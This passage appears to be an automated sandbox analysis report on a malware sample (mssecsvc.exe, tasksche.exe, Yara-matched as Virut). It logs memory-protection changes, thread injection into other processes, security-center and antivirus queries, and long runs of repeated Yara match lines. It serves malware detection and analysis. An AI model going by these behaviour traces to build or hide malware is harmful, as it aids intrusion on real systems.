              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\mssecsvc.exeThread created: unknown EIP: 7FFF3C38Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1Jump to behavior
              Source: dwm.exe, 0000001A.00000000.336695207.0000026F1CEFF000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001A.00000000.336693764.0000026F1CEFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: winlogon.exe, 00000009.00000000.279324344.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000000.268672318.000001593FF70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.791855601.000001593FF70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\1658565894 VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00AC388E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00AC042D

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Changes security center settings (notifications, updates, antivirus, firewall)
              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 00000021.00000000.357714821.00000219BF800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000000.359843562.00000219BFE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.798662143.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000000.359843562.00000219BFE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.798662143.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.795574031.00000219BF950000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.358955359.00000219BF950000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000002.795574031.00000219BF950000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.358955359.00000219BF950000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000018.00000002.785371501.0000025477702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.783169601.0000025477613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: mssecsvc.exe, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: svchost.exe, 00000021.00000000.357714821.00000219BF800000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: mssecsvc.exeBinary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe
              Source: svchost.exe, 00000018.00000002.784869379.0000025477656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Virut
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 684, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 856, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 384, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1312, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Virut
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
